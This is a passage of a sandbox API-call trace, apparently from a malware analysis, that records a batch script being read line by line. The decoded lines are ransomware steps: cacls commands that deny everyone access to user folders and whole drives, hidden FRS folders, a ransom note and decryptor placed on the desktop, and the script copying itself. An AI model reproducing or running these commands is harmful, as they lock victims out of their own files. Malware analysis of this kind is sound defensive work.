hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0133.306] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.306] GetFileType (hFile=0x2ec) returned 0x1 [0133.306] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0133.306] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.306] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0133.306] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0133.306] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0133.306] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.306] GetFileType (hFile=0x2ec) returned 0x1 [0133.306] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0133.307] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.307] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0133.307] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0133.307] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0133.307] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.307] GetFileType (hFile=0x2ec) returned 0x1 [0133.307] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0133.307] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.307] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0133.307] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0133.307] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0133.307] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.307] GetFileType (hFile=0x2ec) returned 0x1 [0133.307] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0133.307] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.307] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0133.307] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0133.307] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0133.307] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.307] GetFileType (hFile=0x2ec) returned 0x1 [0133.307] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0133.307] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.307] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0133.307] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0133.307] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0133.307] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.307] GetFileType (hFile=0x2ec) returned 0x1 [0133.307] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0133.307] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.307] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0133.308] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0133.308] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0133.308] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.308] GetFileType (hFile=0x2ec) returned 0x1 [0133.308] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0133.308] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.308] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0133.308] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0133.308] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0133.308] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.308] GetFileType (hFile=0x2ec) returned 0x1 [0133.308] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0133.308] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.308] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0133.308] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0133.308] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0133.308] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.308] GetFileType (hFile=0x2ec) returned 0x1 [0133.308] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0133.308] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.308] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0133.308] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0133.308] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0133.308] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.308] GetFileType (hFile=0x2ec) returned 0x1 [0133.308] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0133.308] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.308] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0133.308] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0133.308] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0133.309] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.309] GetFileType (hFile=0x2ec) returned 0x1 [0133.309] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0133.309] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.309] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0133.309] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0133.309] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0133.309] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.309] GetFileType (hFile=0x2ec) returned 0x1 [0133.309] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0133.309] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.309] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0133.309] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0133.309] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0133.309] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.309] GetFileType (hFile=0x2ec) returned 0x1 [0133.309] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0133.309] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.309] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0133.309] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0133.309] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0133.309] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.309] GetFileType (hFile=0x2ec) returned 0x1 [0133.309] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0133.309] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.309] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0133.309] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0133.309] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0133.309] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.309] GetFileType (hFile=0x2ec) returned 0x1 [0133.309] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0133.310] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.310] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0133.310] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0133.310] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0133.310] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.310] GetFileType (hFile=0x2ec) returned 0x1 [0133.310] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0133.310] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.310] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0133.310] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0133.310] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0133.310] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.310] GetFileType (hFile=0x2ec) returned 0x1 [0133.310] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0133.310] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.310] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0133.310] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0133.310] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0133.310] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.310] GetFileType (hFile=0x2ec) returned 0x1 [0133.310] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0133.310] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.310] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0133.310] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0133.310] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0133.310] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.310] GetFileType (hFile=0x2ec) returned 0x1 [0133.310] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0133.310] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.311] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0133.311] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0133.311] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0133.311] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.311] GetFileType (hFile=0x2ec) returned 0x1 [0133.311] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0133.311] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.311] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0133.311] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0133.311] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0133.311] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.311] GetFileType (hFile=0x2ec) returned 0x1 [0133.311] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0133.311] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.311] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0133.311] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0133.311] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0133.311] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.311] GetFileType (hFile=0x2ec) returned 0x1 [0133.311] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0133.311] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.311] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0133.311] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0133.311] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0133.311] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.311] GetFileType (hFile=0x2ec) returned 0x1 [0133.311] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0133.311] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.311] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0133.311] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0133.311] SetFilePointer (in: 